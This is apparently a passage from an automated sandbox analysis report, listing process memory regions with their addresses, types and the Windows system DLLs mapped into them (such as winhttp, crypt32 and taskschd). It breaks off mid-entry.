start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5569 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5570 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5572 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5573 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5575 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5576 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5578 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5579 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5581 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5582 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5584 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5585 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5587 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5588 start_va = 0x7fefdfd0000 end_va = 0x7fefed57fff entry_point = 0x7fefdfd0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 5589 start_va = 0x7feff640000 end_va = 0x7feff6b0fff entry_point = 0x7feff640000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5590 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5592 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5593 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5595 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5596 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5597 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5599 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5600 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5602 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5603 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5605 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5606 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5607 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5609 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5610 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5612 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5613 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5615 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5616 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5618 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5619 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5621 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5622 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5624 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5625 start_va = 0x7fefddf0000 end_va = 0x7fefdf56fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 5626 start_va = 0x7fefdc30000 end_va = 0x7fefdc3efff entry_point = 0x7fefdc30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 5627 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5629 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5630 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5632 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5633 start_va = 0x7fef7200000 end_va = 0x7fef7270fff entry_point = 0x7fef7200000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 5634 start_va = 0x7fef7190000 end_va = 0x7fef71f3fff entry_point = 0x7fef7190000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 5635 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5637 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5638 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5640 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5641 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5643 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5644 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5646 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5647 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5649 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5650 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5652 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5653 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5655 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5656 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5658 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5659 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5661 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5662 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5664 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5665 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5667 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5668 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5670 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5671 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5673 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5674 start_va = 0x7fefee30000 end_va = 0x7fefee7cfff entry_point = 0x7fefee30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5675 start_va = 0x7feffec0000 end_va = 0x7feffec7fff entry_point = 0x7feffec0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5676 start_va = 0xc80000 end_va = 0xd2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 5677 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5679 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5680 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5682 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5683 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5685 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5686 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5688 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5689 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5691 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5692 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5694 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5695 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5697 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5698 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5700 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5701 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5703 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5704 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5706 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5707 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5709 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5710 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5712 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5713 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5715 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5716 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5718 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5719 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5721 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5722 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5724 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5726 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5727 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5728 start_va = 0x7fefb680000 end_va = 0x7fefb6a6fff entry_point = 0x7fefb680000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5729 start_va = 0x7fefb670000 end_va = 0x7fefb67afff entry_point = 0x7fefb670000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5730 start_va = 0x7fefcf30000 end_va = 0x7fefcf4dfff entry_point = 0x7fefcf30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 5731 start_va = 0x7fefdb90000 end_va = 0x7fefdb9efff entry_point = 0x7fefdb90000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5732 start_va = 0x7fefd620000 end_va = 0x7fefd66dfff entry_point = 0x7fefd620000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 5733 start_va = 0x7fefd5f0000 end_va = 0x7fefd611fff entry_point = 0x7fefd5f0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 5734 start_va = 0x1f0000 end_va = 0x26cfff entry_point = 0x1f0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 5735 start_va = 0x1f0000 end_va = 0x26cfff entry_point = 0x1f0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 5736 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 5737 start_va = 0xd90000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 5738 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 5739 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 5740 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5741 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 5742 start_va = 0x7fefb8f0000 end_va = 0x7fefba16fff entry_point = 0x7fefb8f0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 5743 start_va = 0x7fefda50000 end_va = 0x7fefda74fff entry_point = 0x7fefda50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 5744 start_va = 0x150000 end_va = 0x150fff entry_point = 0x150000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 5745 start_va = 0x150000 end_va = 0x150fff entry_point = 0x150000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 5746 start_va = 0xe10000 end_va = 0x10defff entry_point = 0xe10000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5747 start_va = 0x150000 end_va = 0x151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 5748 start_va = 0x150000 end_va = 0x151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 5749 start_va = 0x7fef9660000 end_va = 0x7fef9677fff entry_point = 0x7fef9660000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 5750 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5751 start_va = 0x1f0000 end_va = 0x234fff entry_point = 0x1f0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5752 start_va = 0x1f0000 end_va = 0x234fff entry_point = 0x1f0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5753 start_va = 0x1f0000 end_va = 0x234fff entry_point = 0x1f0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5754 start_va = 0x1f0000 end_va = 0x234fff entry_point = 0x1f0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5755 start_va = 0x1f0000 end_va = 0x234fff entry_point = 0x1f0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5756 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5757 start_va = 0x10e0000 end_va = 0x119ffff entry_point = 0x10e0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5758 start_va = 0x7fefd080000 end_va = 0x7fefd089fff entry_point = 0x7fefd080000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 5759 start_va = 0x7fefd420000 end_va = 0x7fefd474fff entry_point = 0x7fefd420000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 5760 start_va = 0x11a0000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 5761 start_va = 0x7fefce20000 end_va = 0x7fefce26fff entry_point = 0x7fefce20000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 5762 start_va = 0x7fefd410000 end_va = 0x7fefd416fff entry_point = 0x7fefd410000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 5763 start_va = 0x7fefd2a0000 end_va = 0x7fefd2fafff entry_point = 0x7fefd2a0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 5764 start_va = 0x12b0000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 5765 start_va = 0x1420000 end_va = 0x151ffff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 5766 start_va = 0x1540000 end_va = 0x163ffff entry_point = 0x0 region_type = private name = "private_0x0000000001540000" filename = "" Region: id = 5767 start_va = 0x7fef96b0000 end_va = 0x7fef9702fff entry_point = 0x7fef96b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 5768 start_va = 0x7fefbc10000 end_va = 0x7fefbc17fff entry_point = 0x7fefbc10000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 5769 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 5770 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 5771 start_va = 0x1690000 end_va = 0x170ffff entry_point = 0x0 region_type = private name = "private_0x0000000001690000" filename = "" Region: id = 5772 start_va = 0x7fee2ed0000 end_va = 0x7fee30a3fff entry_point = 0x7fee2ed0000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 5773 start_va = 0x1710000 end_va = 0x181ffff entry_point = 0x0 region_type = private name = "private_0x0000000001710000" filename = "" Region: id = 5774 start_va = 0x1820000 end_va = 0x19cffff entry_point = 0x0 region_type = private name = "private_0x0000000001820000" filename = "" Region: id = 5775 start_va = 0x19d0000 end_va = 0x1c0ffff entry_point = 0x0 region_type = private name = "private_0x00000000019d0000" filename = "" Region: id = 5776 start_va = 0x1820000 end_va = 0x194ffff entry_point = 0x0 region_type = private name = "private_0x0000000001820000" filename = "" Region: id = 5777 start_va = 0x1950000 end_va = 0x19cffff entry_point = 0x0 region_type = private name = "private_0x0000000001950000" filename = "" Region: id = 5778 start_va = 0x19d0000 end_va = 0x1b7ffff entry_point = 0x0 region_type = private name = "private_0x00000000019d0000" filename = "" Region: id = 5779 start_va = 0x1b90000 end_va = 0x1c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b90000" filename = "" Region: id = 5780 start_va = 0x19d0000 end_va = 0x1acffff entry_point = 0x0 region_type = private name = "private_0x00000000019d0000" filename = "" Region: id = 5781 start_va = 0x1b00000 end_va = 0x1b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 5782 start_va = 0x1c10000 end_va = 0x1e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 5783 start_va = 0x1e80000 end_va = 0x227ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 5784 start_va = 0x150000 end_va = 0x150fff entry_point = 0x150000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 5785 start_va = 0x1f0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 5786 start_va = 0x7fefd0c0000 end_va = 0x7fefd10bfff entry_point = 0x7fefd0c0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5787 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 5788 start_va = 0x2280000 end_va = 0x2a80fff entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 5789 start_va = 0x2a90000 end_va = 0x3290fff entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 5790 start_va = 0x1820000 end_va = 0x189ffff entry_point = 0x0 region_type = private name = "private_0x0000000001820000" filename = "" Region: id = 5791 start_va = 0x18d0000 end_va = 0x194ffff entry_point = 0x0 region_type = private name = "private_0x00000000018d0000" filename = "" Region: id = 5792 start_va = 0x1c10000 end_va = 0x1d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 5793 start_va = 0x1e00000 end_va = 0x1e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 5794 start_va = 0x3300000 end_va = 0x33fffff entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 5795 start_va = 0x3400000 end_va = 0x35fffff entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 5796 start_va = 0x37a0000 end_va = 0x389ffff entry_point = 0x0 region_type = private name = "private_0x00000000037a0000" filename = "" Region: id = 5797 start_va = 0x7fef9310000 end_va = 0x7fef9335fff entry_point = 0x7fef9310000 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 5798 start_va = 0x7fefcf10000 end_va = 0x7fefcf2afff entry_point = 0x7fefcf10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 5799 start_va = 0x7fefd210000 end_va = 0x7fefd266fff entry_point = 0x7fefd210000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 5800 start_va = 0x7fefda20000 end_va = 0x7fefda2afff entry_point = 0x7fefda20000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 5801 start_va = 0x7feffe60000 end_va = 0x7feffeb1fff entry_point = 0x7feffe60000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 5802 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 5803 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 